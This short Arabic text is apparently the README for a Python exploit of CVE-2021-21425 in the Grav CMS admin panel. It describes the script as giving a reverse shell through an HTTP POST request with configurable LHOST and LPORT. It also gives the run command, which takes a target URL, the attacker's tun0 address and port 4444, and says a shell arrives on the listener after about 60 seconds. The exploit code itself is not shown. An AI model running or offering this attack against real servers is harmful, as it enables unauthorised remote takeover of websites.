
سكربت استغلال بلغة بايثون لثغرة CVE-2021-21425 يستهدف لوحة تحكم Grav CMS، ويوفر قشرة عكسية عبر طلب HTTP POST مع إمكانية تهيئة LHOST وLPORT.
هذه نسختي، وجدت الكثير على الإنترنت لكنها سيئة للغاية
python3 exploit.py -u http://[IP]/grav-admin/ --lhost [YOUR TUN0 IP] --lport 4444
انتظر.. لمدة 60 ثانية وستحصل على شيل على المستمع الخاص بك